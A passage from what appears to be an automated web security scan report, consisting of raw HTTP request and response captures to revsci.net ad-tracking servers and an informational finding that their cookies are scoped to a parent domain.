rsi_us_1000000="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"; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jmhOXMMH/C1v6FY5BD9CU6du67BSgvgzGDKYyViGy3JIntSYSCogy2dpq+vTNYcB2lBiDYquxbyc5KyKQd662VMvFJPv1Uq5+hEiNuMv1rrcc9IMSklF2Gl2leH2QScoPwA+qc3858Y0/EEUtJOb1lLVH7Jl7Qf05Ccm9I0A591R0ytDmk3/dhVjwiYtzytZlIJs1ik2IzzOBdpWnUkraZOkhZsuD2xFpH4bDNowwn1Mt6VN61EZkp2gq18WYyq/SwVfAgPacfnhGNoa0j2t6d0mKqWyDVTpo7MOHvpI6TY+rVFV0ctXwqwKtzHWcvOQB1vIOCq3gJbKRdOm8g5ervgtODIWCpKrzehFnf3uFwSbzJASDXKbvuyElRzC3QIB16NfHLy3I3DHw2HO9V+T/KCfhRH7Rg8tuvS6l9sIJ6bwWwyxkslqSob+BWyiSkct1E9Ls74UZqgkQVKs4e/XX/Cvi2KZJnZwugqUBC7SOgAIaDhyR5Dg8c/GsPevQXpUlriLOF4Et1lLKW9x3zc7WGaredOrZXJsBbxC1C7mN5tx6+Q1SUPA1gHY+f4H+VkKygKQ4CpXw31XbXpJItZ0B92GzzCcXVkAmiLUQSOYV1W/Xy3POJ+TzKnDfYSd8TU8zoIYLon5ZgAMALC/NMZCwDrluIvv94WuEX/TlfGa5341PraigX3lIAkpAbjmPB9q8wtyPoXTFON4tmbY3kWHTnleZLQfDfv64aXjU4vTZ/h45ksmfnshZDire56+37j; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ib.adnxs.com/seg?member=514&add_code=
Content-Length: 0
Date: Wed, 06 Jul 2011 14:01:07 GMT


9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/203785884.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/203785884.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252F%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="pUMFIjmjMAYa1A1HNiNf4aD897fu+6/C9AYxnI+C7nqajjZy/BAe74V9YzefmTopYODsSlf0yPRabejKYU/oSL9Owap6XOeUQ4ciV1tzQfT3iO0MrhrH2lJL6or6DakcL1/R5rlzLW0Pmg4PjyesEXJyespCvzpiydwXlQkz5P+UjuxvsK7zEYNz1svYpqlSkbg3IDw6kcgOe7SNUYJFpFXIyxXgABWM3N3zv8Q1xWtl7iDsYKKkJP5ERoVfGZbiXD4RdCoNYQD91hfjwxGcWkC++FiIFmVpa6Gk1swE0IqnmLypaxfG9gOYWF7NqC6fh1PY5HwirT/IgOnCAMHC0H/kiGEca+FtCA7m9ae2gs4q6CiNOj55Dt1//UlBU/Y3iWVkNjKs/KIv5kg1ZecKuwAYB7vudzrXFDfgCnfjXnu+FYwuhUmF6/VqVS1i9BXbeuzG7kklGFvaKZ5Wx+FB3CsRdvb+a+vAS/Zmwg4p7/oVCzFOf/+pmM41wTvkUzi90tckSUpXsEC+dwnNVzXi6nHZ/F5pNbipO0Li4Rl+1fFEIte+mZ4NmTw6j3NeHooTwXKnk8PyEHLSASgOoUrzxbQXKawd5eqdAiwI1sNzUV8GYgkzyhrpTthweZJtNUV6DgxzVxlrXY+5mc2THvCA+ily4O24gMpBghIbJBbEtCFi91u2CjeoWsO8am9kaTpheByALnVQQhbnvGm+l3g64IgEqCNJe+JAwfccd5IHlfXx4kqV1QLYVS6K6U7XCVZGntQx7NqEFQwh3u21azYppOlv3/vxzR7T8ni2uZTDpndUH+do1MI61OO4x1rUXNKGWaFwhYJPBmGIFvGIxe5PITc9SDxzLkhi7tea6hmj5NgS3UZvJF8WkY/iJim88X7mWWAndpfBjo/k+EC8/OB5JTpn56gPbDMvO0Ws+hbMUhOHyId1s398RsDRTmij83l43RLcVuuETWuLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKV2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkXSeYP0Sa055Jowm8c3VOEyblQFx7TAFSHkDq5YarNx1BjiCNS5TIpkc8zWlMERLAj742CxFJcNA7+7bqXIMkedmLdIFCZB9EytlUUk2Wv+5bLxiGCvU7D9PKFK0AL+dBnINTfAdFFeU5V0gNWg/nmqkSauAt5gv+8Fxo2cwZVbGk7dnQQn+9n5+QszAAPIydnCTLTIgJ4G6WYBuM17MZz6TuczSP7tRbv0S09gMIBdvRMwHEvwOgpIicDjuJvV7gSa/6iqC+gbiIb4QzUGcNwnTPek2Koeo6DfiyyL0nr5ij0dsLecPRMQthM0F02MOgu97p3jdHjUYxxhUMCjWZrnvY3xKe82rO0/jh01TEEum7etTVKj1Hz0+cD/+xj2Ud6B13Kee6LMzJfe3vcmTgaFpPwrzNfhdidJDaqe3iFptr/Hp6twVrFJ2DsiW6qXQHtc+D6U6SEvc9WPty7qC6Ie8wPnBlXCc0ZAeAYZJZMMwoYL5cs0GfQ6aBsf25DOKI33YmUXvcil98AdDD6HQK3DBak/IHo+MavdGABKfVj7rLBjs8cdrHUY61ddS3N6dWWLk136nQxh5xSI7hSwFb0wt1JokhQDrLrmSqJn4Xwf2BZ6FCFjNAX/enZekmUzEJqNSouPjLLzPTYwTFEXtxV7oY+Jl1yyo9rDqrPQMS8SkT/MmRb2uBbNwnKCHvLCx2LIla1Kw8f4tNak2r5LZCZKtggTm/cFjaluhBUR9Uvnf8wfZzBjv+T7CNGGpiwzqsxRJQmgoQCeTBqs9ANTeuXsr5gyey1KwHhRC7JVzPR20HhlE+cJB3esBjEnQKtEa7viDXqBYPpVlIQYk33dE9HlH5W5ML4jItbdPYkX0HXuSp21yN/UNiPWzYoGS2ICl3/j2fKzxhWibA9Ga4eVS61QlrnZ0QapS5GW2WBwsuEqO6wJHYEU+LsvEk8Jhcu0MP2y5GIjqK0MdWo="; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
